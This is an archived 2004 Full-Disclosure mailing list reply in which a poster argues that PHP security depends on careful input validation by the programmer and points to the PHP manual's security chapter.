Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] How secure is PHP ?

From: Gary E. Miller (gemrellim.com)
Date: Mon Nov 01 2004 - 13:05:15 CST

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Yo Nayana!

On Mon, 1 Nov 2004, Nayana Somaratna wrote:

> However, when browsing the web, I found an article which said that "it
> requires an expert to lockdown php" (Sorry, but I can't quite recall
> the URL).

Saying PHP in insecure is like saying C is insecure. Until their is
a programmer involved, writing bad code, there is no problem. Just like
C if the programmer carefully validates and contrains ALL input then
the program is not only secure but robust.

> So, I'd like to ask the members of this list - how difficult is it to
> secure php ? Do you really need a security "expert" to do this ?

PHP has very good write ups on security in the online doc. Here is the
chapter:

        http://www.php.net/manual/en/security.php

If you can read, understand and FOLLOW those recomendatins then you are OK.
If not, then get the assistance of an "expert" that does.

RGDS
GARY
- ---------------------------------------------------------------------------
Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701
        gemrellim.com Tel:+1(541)382-8588 Fax: +1(541)382-8676

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)

iD8DBQFBhoju8KZibdeR3qURAmzpAJ928ofMk+NqtWLPHNg/FwWQ7HE/UwCfVwpW
eANLHG73S0GOZcgi5zyIVW0=
=VsB9
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 

1216 messages sorted by: [ date ] [ thread ] [ subject ]

Starting: Fri Oct 01 2004 - 17:29:08 CDT
Ending: Mon Nov 01 2004 - 14:48:28 CST

Last message date: Mon Nov 01 2004 - 14:48:28 CST
Archived on: Mon Nov 01 2004 - 14:48:33 CST

1216 messages sorted by: [ date ] [ thread ] [ subject ]

 

Most recent messages
1216 messages sorted by: [ author ] [ thread ] [ subject ]

Starting: Fri Oct 01 2004 - 17:29:08 CDT
Ending: Mon Nov 01 2004 - 14:48:28 CST